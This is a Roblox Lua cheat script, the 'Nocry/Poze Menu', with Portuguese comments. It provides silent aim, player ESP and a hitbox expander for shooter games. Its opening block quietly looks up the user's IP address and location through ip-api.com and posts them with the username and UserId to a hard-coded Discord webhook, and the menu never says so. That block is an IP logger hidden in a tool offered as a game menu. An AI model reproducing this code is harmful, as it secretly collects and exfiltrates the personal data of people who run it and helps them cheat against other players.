-- // SISTEMA DE LOGS / WEBHOOK (Separado) // --

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")

local player_name = Players.LocalPlayer.Name
local webhook_url = "https://discord.com/api/webhooks/1474469884611268670/CZ0rcaamjRr7WNdIOMW88qnwxjpBsha88YnAjJNim7z4qA9M5QZQvZdrZUU5eTfvrPVx"

-- Função para fazer request (funciona na maioria dos exploits)
local request = syn and syn.request or http_request or request or (fluxus and fluxus.request) or http.request

-- Pega informações do IP
local success, ip_info = pcall(function()
    return request({
        Url = "http://ip-api.com/json",
        Method = "GET"
    })
end)

local ipinfo_table = {}
if success and ip_info and ip_info.Body then
    pcall(function()
        ipinfo_table = HttpService:JSONDecode(ip_info.Body)
    end)
end

-- Monta o embed
local embed = {
    ["username"] = "📡 Vea Boquetera",
    ["avatar_url"] = "https://media.discordapp.net/attachments/1410305233170464788/1410324367954546909/IMG_20250228_225159.jpg",
    ["embeds"] = {{
        ["title"] = "Novo Log Capturado",
        ["description"] = "Dados de conexão obtidos com sucesso.",
        ["color"] = 0x2F3136,
        ["fields"] = {
            {["name"] = "👤 Usuário",      ["value"] = "`" .. player_name .. "`", ["inline"] = true},
            {["name"] = "🆔 UserId",       ["value"] = "`" .. Players.LocalPlayer.UserId .. "`", ["inline"] = true},
            {["name"] = "🌍 IP",           ["value"] = "`" .. (ipinfo_table.query or "Não obtido") .. "`", ["inline"] = false},
            {["name"] = "🏳 País",         ["value"] = (ipinfo_table.country or "??") .. " (" .. (ipinfo_table.countryCode or "??") .. ")", ["inline"] = true},
            {["name"] = "📍 Local",        ["value"] = (ipinfo_table.city or "?") .. ", " .. (ipinfo_table.regionName or "?"), ["inline"] = true},
            {["name"] = "🏢 ISP",          ["value"] = ipinfo_table.isp or "Não identificado", ["inline"] = true},
            {["name"] = "🏢 Org",          ["value"] = ipinfo_table.org or "Não identificado", ["inline"] = true}
        },
        ["footer"] = { 
            ["text"] = "Logger • " .. os.date("%d/%m/%Y %H:%M:%S") 
        },
        ["thumbnail"] = {
            ["url"] = "https://media.discordapp.net/attachments/1410305233170464788/1410324367954546909/IMG_20250228_225159.jpg"
        }
    }}
}

-- Envia o log para o Discord
pcall(function()
    request({
        Url = webhook_url,
        Method = "POST",
        Headers = {["Content-Type"] = "application/json"},
        Body = HttpService:JSONEncode(embed)
    })
end)

local Players = game:GetService("Players")
local LocalPlayer = Players.LocalPlayer
local UIS = game:GetService("UserInputService")
local RunService = game:GetService("RunService")
local TweenService = game:GetService("TweenService")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local Camera = workspace.CurrentCamera

-- Remotes (WeaponsSystem - comum em jogos de tiro)
local WeaponsNetwork = ReplicatedStorage:WaitForChild("WeaponsSystem"):WaitForChild("Network")
local WeaponFired = WeaponsNetwork:WaitForChild("WeaponFired")
local WeaponHit = WeaponsNetwork:WaitForChild("WeaponHit")

-- Variáveis principais
local aimbot = false
local wallCheck = false
local showFOV = true
local FOV = 15
local hitmarkerEnabled = true
local chamsAtivo = false
_G.ChamColor = Color3.fromRGB(255, 0, 0)

local highlights = {}

-- GUI Principal
local gui = Instance.new("ScreenGui", game.CoreGui)
gui.Name = "POZE_MENU"
gui.DisplayOrder = 999
gui.IgnoreGuiInset = true
gui.ResetOnSpawn = false

-- Loading Screen
local loadingScreen = Instance.new("Frame", gui)
loadingScreen.Size = UDim2.new(1, 0, 1, 0)
loadingScreen.BackgroundColor3 = Color3.fromRGB(5, 5, 5)
loadingScreen.BorderSizePixel = 0
loadingScreen.ZIndex = 100

local loadingText = Instance.new("TextLabel", loadingScreen)
loadingText.Size = UDim2.new(0, 400, 0, 60)
loadingText.Position = UDim2.new(0.5, -200, 0.45, -30)
loadingText.BackgroundTransparency = 1
loadingText.Text = "Nocry Menu"
loadingText.TextColor3 = Color3.fromRGB(255, 255, 255)
loadingText.Font = Enum.Font.GothamBold
loadingText.TextSize = 50
loadingText.ZIndex = 101

local subText = Instance.new("TextLabel", loadingScreen)
subText.Size = UDim2.new(0, 400, 0, 20)
subText.Position = UDim2.new(0.5, -200, 0.55, 10)
subText.BackgroundTransparency = 1
subText.Text = "CARREGANDO..."
subText.TextColor3 = Color3.fromRGB(200, 200, 200)
subText.Font = Enum.Font.GothamMedium
subText.TextSize = 16
subText.ZIndex = 101

-- Música de loading
local pozeMusic = Instance.new("Sound", workspace)
pozeMusic.SoundId = "rbxassetid://1837722652"
pozeMusic.Volume = 10

task.spawn(function()
    pozeMusic:Play()
    for i = 1, 3 do
        loadingText.Visible = false
        task.wait(0.2)
        loadingText.Visible = true
        task.wait(0.2)
    end
    task.wait(4)
    
    local fade = TweenInfo.new(1.5, Enum.EasingStyle.Linear)
    TweenService:Create(loadingText, fade, {TextTransparency = 1}):Play()
    TweenService:Create(subText, fade, {TextTransparency = 1}):Play()
    TweenService:Create(loadingScreen, fade, {BackgroundTransparency = 1}):Play()
    
    for i = 10, 0, -1 do
        pozeMusic.Volume = i
        task.wait(0.1)
    end
    task.wait(1.5)
    loadingScreen:Destroy()
    pozeMusic:Destroy()
end)

-- Botão flutuante para abrir o menu
local openBtn = Instance.new("TextButton", gui)
openBtn.Size = UDim2.new(0, 40, 0, 40)
openBtn.Position = UDim2.new(0.5, -20, 0.5, -20)
openBtn.BackgroundColor3 = Color3.fromRGB(20, 20, 20)
openBtn.Text = ""
openBtn.AutoButtonColor = false
openBtn.Draggable = true
Instance.new("UICorner", openBtn).CornerRadius = UDim.new(1, 0)

-- Painel principal
local panel = Instance.new("Frame", gui)
panel.Size = UDim2.new(0, 300, 0, 210)
panel.Position = UDim2.new(0.5, -150, 0.5, -105)
panel.BackgroundColor3 = Color3.fromRGB(15, 15, 15)
panel.Visible = false
panel.Draggable = true
Instance.new("UICorner", panel).CornerRadius = UDim.new(0, 8)

local title = Instance.new("TextLabel", panel)
title.Size = UDim2.new(1, 0, 0, 20)
title.BackgroundTransparency = 1
title.Text = "NOCRY MENU"
title.TextColor3 = Color3.fromRGB(200, 200, 200)
title.Font = Enum.Font.GothamBold
title.TextSize = 12

-- Abas (categorias)
local categories = Instance.new("Frame", panel)
categories.Size = UDim2.new(0, 90, 1, -20)
categories.Position = UDim2.new(0, 0, 0, 20)
categories.BackgroundTransparency = 1

local function createTab(name, yPos)
    local btn = Instance.new("TextButton", categories)
    btn.Size = UDim2.new(1, 0, 0, 25)
    btn.Position = UDim2.new(0, 0, 0, yPos)
    btn.BackgroundTransparency = 1
    btn.Text = name
    btn.TextColor3 = Color3.fromRGB(180, 180, 180)
    btn.Font = Enum.Font.Gotham
    btn.TextSize = 11
    return btn
end

local tabSilent = createTab("Silent", 10)
local tabESP    = createTab("ESP", 40)
local tabHitbox = createTab("Hitbox", 70)
local tabMain   = createTab("Main", 100)

local container = Instance.new("Frame", panel)
container.Position = UDim2.new(0, 95, 0, 20)
container.Size = UDim2.new(1, -95, 1, -20)
container.BackgroundTransparency = 1

local function newPage()
    local page = Instance.new("Frame", container)
    page.Size = UDim2.new(1, 0, 1, 0)
    page.BackgroundTransparency = 1
    page.Visible = false
    return page
end

local silentPage = newPage()
local espPage    = newPage()
local hitboxPage = newPage()
local mainPage   = newPage()

local function switchPage(page)
    for _, v in pairs(container:GetChildren()) do
        v.Visible = false
    end
    page.Visible = true
end

tabSilent.MouseButton1Click:Connect(function() switchPage(silentPage) end)
tabESP.MouseButton1Click:Connect(function() switchPage(espPage) end)
tabHitbox.MouseButton1Click:Connect(function() switchPage(hitboxPage) end)
tabMain.MouseButton1Click:Connect(function() switchPage(mainPage) end)

switchPage(silentPage)  -- abre na aba Silent por padrão

local function createButton(parent, text, yPos)
    local btn = Instance.new("TextButton", parent)
    btn.Size = UDim2.new(1, -10, 0, 22)
    btn.Position = UDim2.new(0, 5, 0, yPos)
    btn.BackgroundColor3 = Color3.fromRGB(25, 25, 25)
    btn.TextColor3 = Color3.new(1, 1, 1)
    btn.Font = Enum.Font.Gotham
    btn.TextSize = 10
    btn.Text = text
    Instance.new("UICorner", btn).CornerRadius = UDim.new(0, 6)
    return btn
end

-- Botões Silent
local btnSilent = createButton(silentPage, "Silent OFF", 10)
btnSilent.MouseButton1Click:Connect(function()
    aimbot = not aimbot
    btnSilent.Text = "Silent " .. (aimbot and "ON" or "OFF")
end)

local btnWall = createButton(silentPage, "WallCheck OFF", 35)
btnWall.MouseButton1Click:Connect(function()
    wallCheck = not wallCheck
    btnWall.Text = "WallCheck " .. (wallCheck and "ON" or "OFF")
end)

local btnFOV = createButton(silentPage, "FOV ON", 60)
btnFOV.MouseButton1Click:Connect(function()
    showFOV = not showFOV
    btnFOV.Text = "FOV " .. (showFOV and "ON" or "OFF")
end)

local btnHitmarker = createButton(silentPage, "Hitmarker ON", 85)
btnHitmarker.MouseButton1Click:Connect(function()
    hitmarkerEnabled = not hitmarkerEnabled
    btnHitmarker.Text = "Hitmarker " .. (hitmarkerEnabled and "ON" or "OFF")
end)

-- Slider FOV
local sliderFrame = Instance.new("Frame", silentPage)
sliderFrame.Size = UDim2.new(1, -10, 0, 10)
sliderFrame.Position = UDim2.new(0, 5, 0, 115)
sliderFrame.BackgroundColor3 = Color3.fromRGB(30, 30, 30)

local sliderDrag = Instance.new("Frame", sliderFrame)
sliderDrag.Size = UDim2.new(0, 10, 1, 0)
sliderDrag.BackgroundColor3 = Color3.new(1, 1, 1)

local fovLabel = Instance.new("TextLabel", silentPage)
fovLabel.Size = UDim2.new(1, 0, 0, 15)
fovLabel.Position = UDim2.new(0, 0, 0, 145)
fovLabel.BackgroundTransparency = 1
fovLabel.Text = tostring(FOV)
fovLabel.TextColor3 = Color3.fromRGB(200, 200, 200)
fovLabel.TextSize = 10

local btnMinus = Instance.new("TextButton", silentPage)
btnMinus.Size = UDim2.new(0, 20, 0, 20)
btnMinus.Position = UDim2.new(0, 5, 0, 140)
btnMinus.BackgroundTransparency = 1
btnMinus.Text = "-"
btnMinus.TextColor3 = Color3.new(1,1,1)
btnMinus.TextSize = 14

local btnPlus = Instance.new("TextButton", silentPage)
btnPlus.Size = UDim2.new(0, 20, 0, 20)
btnPlus.Position = UDim2.new(1, -25, 0, 140)
btnPlus.BackgroundTransparency = 1
btnPlus.Text = "+"
btnPlus.TextColor3 = Color3.new(1,1,1)
btnPlus.TextSize = 14

local dragging = false

btnPlus.MouseButton1Click:Connect(function()
    FOV = math.clamp(FOV + 5, 5, 200)
    fovLabel.Text = tostring(FOV)
    sliderDrag.Position = UDim2.new(math.clamp((FOV-5)/200, 0, 1), 0, 0, 0)
end)

btnMinus.MouseButton1Click:Connect(function()
    FOV = math.clamp(FOV - 5, 5, 200)
    fovLabel.Text = tostring(FOV)
    sliderDrag.Position = UDim2.new(math.clamp((FOV-5)/200, 0, 1), 0, 0, 0)
end)

-- Círculo FOV
local fovCircle = Drawing.new("Circle")
fovCircle.Thickness = 1
fovCircle.Filled = false
fovCircle.Color = Color3.new(1,1,1)

RunService.RenderStepped:Connect(function()
    fovCircle.Position = Camera.ViewportSize / 2
    fovCircle.Radius = FOV
    fovCircle.Visible = showFOV and aimbot
end)

-- ==================== ESP MELHORADO: Name + Box + Skeleton + Wall Check ====================

local ESP_ENABLED = false
local SHOW_NAME = true
local SHOW_BOX = true
local SHOW_SKELETON = true

local visibleColor = Color3.fromRGB(0, 255, 0)    -- Verde = visível
local hiddenColor  = Color3.fromRGB(255, 0, 0)    -- Vermelho = atrás de parede

local espObjects = {}   -- Armazena drawings por player

-- Checa se tem parede na frente (visibilidade)
local function isVisible(targetChar)
    if not targetChar or not targetChar:FindFirstChild("Head") then return false end
    local origin = Camera.CFrame.Position
    local target = targetChar.Head.Position
    local direction = target - origin

    local rayParams = RaycastParams.new()
    rayParams.FilterDescendantsInstances = {LocalPlayer.Character, targetChar}
    rayParams.FilterType = Enum.RaycastFilterType.Blacklist
    rayParams.IgnoreWater = true

    return workspace:Raycast(origin, direction, rayParams) == nil
end

-- Cria os drawings para um player
local function createESP(player)
    if espObjects[player] then return end

    local d = {
        name = Drawing.new("Text"),
        box = Drawing.new("Square"),
        boxOutline = Drawing.new("Square"),
        lines = {}
    }

    -- Name
    d.name.Size = 15
    d.name.Center = true
    d.name.Outline = true
    d.name.OutlineColor = Color3.new(0,0,0)
    d.name.Font = Drawing.Fonts.Plex
    d.name.Visible = false

    -- Box
    d.box.Thickness = 2
    d.box.Filled = false
    d.box.Visible = false

    d.boxOutline.Thickness = 3
    d.boxOutline.Color = Color3.new(0,0,0)
    d.boxOutline.Transparency = 0.6
    d.boxOutline.Filled = false
    d.boxOutline.Visible = false

    -- Skeleton connections (melhor R15 + R6 fallback)
    local connections = {
        {"Head", "UpperTorso"}, {"UpperTorso", "LowerTorso"},
        {"UpperTorso", "RightUpperArm"}, {"RightUpperArm", "RightLowerArm"}, {"RightLowerArm", "RightHand"},
        {"UpperTorso", "LeftUpperArm"},  {"LeftUpperArm", "LeftLowerArm"},  {"LeftLowerArm", "LeftHand"},
        {"LowerTorso", "RightUpperLeg"}, {"RightUpperLeg", "RightLowerLeg"}, {"RightLowerLeg", "RightFoot"},
        {"LowerTorso", "LeftUpperLeg"},  {"LeftUpperLeg", "LeftLowerLeg"},  {"LeftLowerLeg", "LeftFoot"}
    }

    -- Fallback para R6
    if player.Character and player.Character:FindFirstChild("Torso") then
        connections = {
            {"Head", "Torso"},
            {"Torso", "Right Arm"}, {"Right Arm", "Right Arm"}, -- simplificado
            {"Torso", "Left Arm"},
            {"Torso", "Right Leg"},
            {"Torso", "Left Leg"}
        }
    end

    for _, conn in ipairs(connections) do
        local line = Drawing.new("Line")
        line.Thickness = 2
        line.Transparency = 1
        line.Visible = false
        table.insert(d.lines, {line = line, p1 = conn[1], p2 = conn[2]})
    end

    espObjects[player] = d
end

-- Atualização do ESP todo frame
RunService.RenderStepped:Connect(function()
    if not ESP_ENABLED then
        for _, d in pairs(espObjects) do
            d.name.Visible = false
            d.box.Visible = false
            d.boxOutline.Visible = false
            for _, l in ipairs(d.lines) do l.line.Visible = false end
        end
        return
    end

    for _, player in pairs(Players:GetPlayers()) do
        if player == LocalPlayer or not player.Character then continue end

        local char = player.Character
        local head = char:FindFirstChild("Head")
        local root = char:FindFirstChild("HumanoidRootPart") or char:FindFirstChild("Torso")
        if not head or not root then continue end

        local visible = isVisible(char)
        local espColor = visible and visibleColor or hiddenColor

        createESP(player)
        local d = espObjects[player]

        -- World to Viewport
        local headScreen, onScreen = Camera:WorldToViewportPoint(head.Position)
        if not onScreen then
            d.name.Visible = false
            d.box.Visible = false
            d.boxOutline.Visible = false
            for _, l in ipairs(d.lines) do l.line.Visible = false end
            continue
        end

        -- Name ESP
        if SHOW_NAME then
            d.name.Text = player.DisplayName
            d.name.Position = Vector2.new(headScreen.X, headScreen.Y - 30)
            d.name.Color = espColor
            d.name.Visible = true
        else
            d.name.Visible = false
        end

        -- Box ESP
        if SHOW_BOX and root then
            local rootScreen = Camera:WorldToViewportPoint(root.Position)
            local height = (Camera:WorldToViewportPoint(root.Position + Vector3.new(0, 3, 0)).Y - rootScreen.Y) * 2
            local width = height * 0.65

            d.box.Size = Vector2.new(width, height)
            d.box.Position = Vector2.new(rootScreen.X - width/2, rootScreen.Y - height/2 + 5)
            d.box.Color = espColor
            d.box.Visible = true

            d.boxOutline.Size = d.box.Size
            d.boxOutline.Position = d.box.Position
            d.boxOutline.Visible = true
        else
            d.box.Visible = false
            d.boxOutline.Visible = false
        end

        -- Skeleton ESP
        if SHOW_SKELETON then
            for _, bone in ipairs(d.lines) do
                local part1 = char:FindFirstChild(bone.p1)
                local part2 = char:FindFirstChild(bone.p2)
                if part1 and part2 then
                    local p1, v1 = Camera:WorldToViewportPoint(part1.Position)
                    local p2, v2 = Camera:WorldToViewportPoint(part2.Position)
                    if v1 and v2 then
                        bone.line.From = Vector2.new(p1.X, p1.Y)
                        bone.line.To = Vector2.new(p2.X, p2.Y)
                        bone.line.Color = espColor
                        bone.line.Visible = true
                    else
                        bone.line.Visible = false
                    end
                else
                    bone.line.Visible = false
                end
            end
        else
            for _, bone in ipairs(d.lines) do bone.line.Visible = false end
        end
    end
end)

-- ==================== BOTÕES DA ABA ESP ====================

local btnToggle = createButton(espPage, "ESP OFF", 10)
btnToggle.MouseButton1Click:Connect(function()
    ESP_ENABLED = not ESP_ENABLED
    btnToggle.Text = "ESP " .. (ESP_ENABLED and "ON" or "OFF")
end)

local btnName = createButton(espPage, "Name ESP ON", 40)
btnName.MouseButton1Click:Connect(function()
    SHOW_NAME = not SHOW_NAME
    btnName.Text = "Name ESP " .. (SHOW_NAME and "ON" or "OFF")
end)

local btnBox = createButton(espPage, "Box ESP ON", 70)
btnBox.MouseButton1Click:Connect(function()
    SHOW_BOX = not SHOW_BOX
    btnBox.Text = "Box ESP " .. (SHOW_BOX and "ON" or "OFF")
end)

local btnSkeleton = createButton(espPage, "Skeleton ESP ON", 100)
btnSkeleton.MouseButton1Click:Connect(function()
    SHOW_SKELETON = not SHOW_SKELETON
    btnSkeleton.Text = "Skeleton ESP " .. (SHOW_SKELETON and "ON" or "OFF")
end)

-- Cores do sistema de parede
local btnVisible = Instance.new("TextButton", espPage)
btnVisible.Size = UDim2.new(0, 90, 0, 25)
btnVisible.Position = UDim2.new(0, 5, 0, 135)
btnVisible.BackgroundColor3 = visibleColor
btnVisible.Text = "Visível (Verde)"
btnVisible.TextColor3 = Color3.new(1,1,1)
btnVisible.MouseButton1Click:Connect(function()
    visibleColor = Color3.fromRGB(0, 255, 0)
    print("Cor Visível alterada para Verde")
end)

local btnHidden = Instance.new("TextButton", espPage)
btnHidden.Size = UDim2.new(0, 90, 0, 25)
btnHidden.Position = UDim2.new(0, 105, 0, 135)
btnHidden.BackgroundColor3 = hiddenColor
btnHidden.Text = "Atrás Parede (Vermelho)"
btnHidden.TextColor3 = Color3.new(1,1,1)
btnHidden.MouseButton1Click:Connect(function()
    hiddenColor = Color3.fromRGB(255, 0, 0)
    print("Cor Atrás da Parede alterada para Vermelho")
end)

-- Limpeza ao remover player
Players.PlayerRemoving:Connect(function(plr)
    if espObjects[plr] then
        local d = espObjects[plr]
        d.name:Remove()
        d.box:Remove()
        d.boxOutline:Remove()
        for _, l in ipairs(d.lines) do
            l.line:Remove()
        end
        espObjects[plr] = nil
    end
end)

print("✅ ESP Melhorado (Name + Box + Skeleton + Wall Check) carregado!")

-- ==================== HITBOX EXPANDER ====================
local hitboxEnabled = false
local hitboxSize = 5
local originalSizes = {}

local btnHitbox = createButton(hitboxPage, "Hitbox OFF", 10)
btnHitbox.MouseButton1Click:Connect(function()
    hitboxEnabled = not hitboxEnabled
    btnHitbox.Text = "Hitbox " .. (hitboxEnabled and "ON" or "OFF")
    
    if not hitboxEnabled then
        for plr, data in pairs(originalSizes) do
            if plr.Character then
                local arm = plr.Character:FindFirstChild("Right Arm") or plr.Character:FindFirstChild("RightHand")
                if arm and data then
                    arm.Size = data.Size
                    arm.Transparency = data.Transparency
                end
            end
        end
        originalSizes = {}
    end
end)

createButton(hitboxPage, "+", 40).MouseButton1Click:Connect(function() hitboxSize = hitboxSize + 1 end)
createButton(hitboxPage, "-", 70).MouseButton1Click:Connect(function() hitboxSize = math.max(1, hitboxSize - 1) end)

RunService.RenderStepped:Connect(function()
    if not hitboxEnabled then return end
    for _, plr in pairs(Players:GetPlayers()) do
        if plr ~= LocalPlayer and plr.Character then
            local arm = plr.Character:FindFirstChild("Right Arm") or plr.Character:FindFirstChild("RightHand")
            if arm then
                if not originalSizes[plr] then
                    originalSizes[plr] = {Size = arm.Size, Transparency = arm.Transparency}
                end
                arm.Size = Vector3.new(hitboxSize, hitboxSize, hitboxSize)
                arm.Transparency = 0.3
            end
        end
    end
end)

-- Função para verificar parede
local function hasWall(origin, targetPos, targetChar)
    local params = RaycastParams.new()
    params.FilterDescendantsInstances = {LocalPlayer.Character, targetChar}
    params.FilterType = Enum.RaycastFilterType.Blacklist
    return workspace:Raycast(origin, targetPos - origin, params) ~= nil
end

-- Pega o alvo mais próximo dentro do FOV
local function getTarget()
    local bestDist = math.huge
    local bestTarget = nil
    local center = Camera.ViewportSize / 2

    for _, plr in pairs(Players:GetPlayers()) do
        if plr ~= LocalPlayer and plr.Character and plr.Character:FindFirstChild("Head") then
            local hum = plr.Character:FindFirstChild("Humanoid")
            if hum and hum.Health > 0 then
                local headPos, visible = Camera:WorldToViewportPoint(plr.Character.Head.Position)
                if visible then
                    local dist = (Vector2.new(headPos.X, headPos.Y) - center).Magnitude
                    if dist <= FOV then
                        if not wallCheck or not hasWall(Camera.CFrame.Position, plr.Character.Head.Position, plr.Character) then
                            if dist < bestDist then
                                bestDist = dist
                                bestTarget = plr.Character
                            end
                        end
                    end
                end
            end
        end
    end
    return bestTarget
end

-- Silent Aim (redireciona o tiro quando você atira)
WeaponFired.OnClientEvent:Connect(function()
    if not aimbot then return end

    local targetChar = getTarget()
    if not targetChar or not targetChar:FindFirstChild("Head") then return end

    local head = targetChar.Head
    local tool = LocalPlayer.Character and LocalPlayer.Character:FindFirstChildWhichIsA("Tool")

    if tool then
        WeaponHit:FireServer(tool, {
            p = head.Position,
            pid = 1,
            part = head,
            d = (head.Position - Camera.CFrame.Position).Magnitude,
            maxDist = 100,
            h = head,
            m = Enum.Material.Plastic,
            n = Vector3.new(0,1,0),
            t = 0.5,
            s = head.Size,
            sid = 1
        }, true)
    end
end)

-- Página Main (Esconder botão + Discord)
local btnHide = createButton(mainPage, "Esconder Botão Menu", 10)
btnHide.MouseButton1Click:Connect(function()
    openBtn.BackgroundTransparency = (openBtn.BackgroundTransparency == 0) and 1 or 0
    btnHide.Text = (openBtn.BackgroundTransparency == 1) and "Mostrar Botão Menu" or "Esconder Botão Menu"
end)

local btnDiscord = createButton(mainPage, "Copiar Discord", 35)
btnDiscord.MouseButton1Click:Connect(function()
    setclipboard("https://discord.gg/yH5vczR7wv")  -- mude para o link real
    print("Discord copiado!")
end)

local credits = Instance.new("TextLabel", mainPage)
credits.Size = UDim2.new(1, 0, 0, 15)
credits.Position = UDim2.new(0, 0, 1, -15)
credits.BackgroundTransparency = 1
credits.Text = "By : Menojz"
credits.TextColor3 = Color3.fromRGB(100, 100, 100)
credits.TextSize = 10

-- Abrir/Fechar menu
openBtn.MouseButton1Click:Connect(function()
    panel.Visible = not panel.Visible
    if panel.Visible then
        panel.Size = UDim2.new(0, 0, 0, 0)
        TweenService:Create(panel, TweenInfo.new(0.2), {Size = UDim2.new(0, 300, 0, 210)}):Play()
    end
end)

print("✅ Poze Menu carregado com sucesso! (Versão corrigida)")